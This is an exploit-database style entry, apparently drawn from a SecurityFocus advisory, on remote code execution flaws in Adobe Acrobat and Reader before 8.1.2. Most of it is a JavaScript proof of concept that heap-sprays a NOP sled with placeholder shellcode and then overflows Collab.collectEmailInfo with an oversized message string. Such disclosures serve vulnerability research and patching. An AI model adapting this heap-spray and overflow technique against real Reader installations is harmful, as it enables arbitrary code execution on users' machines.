25 lines
No EOL
885 B
Text
25 lines
No EOL
885 B
Text
source: http://www.securityfocus.com/bid/27641/info
|
|
|
|
Adobe Acrobat and Reader are prone to multiple arbitrary remote code-execution and security vulnerabilities.
|
|
|
|
Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application. Other attacks are also possible.
|
|
|
|
Versions prior to Adobe Acrobat and Adobe Reader 8.1.2 are vulnerable to these issues.
|
|
|
|
function repeat(count,what) {
|
|
var v = "";
|
|
while (--count >= 0) v += what;
|
|
return v;
|
|
}
|
|
function heapspray(shellcode) {
|
|
block='';
|
|
fillblock = unescape("%u9090");
|
|
while(block.length+20+shellcode.length<0x40000)
|
|
block = block+block+fillblock;
|
|
arr = new Array();
|
|
for (i=0;i<200;i++) arr[i]=block + shellcode;
|
|
}
|
|
|
|
heapspray(unescape(“%ucccc%ucccc”));
|
|
Collab.collectEmailInfo({
|
|
msg:repeat(4096, unescape("%u0909%u0909"))}); |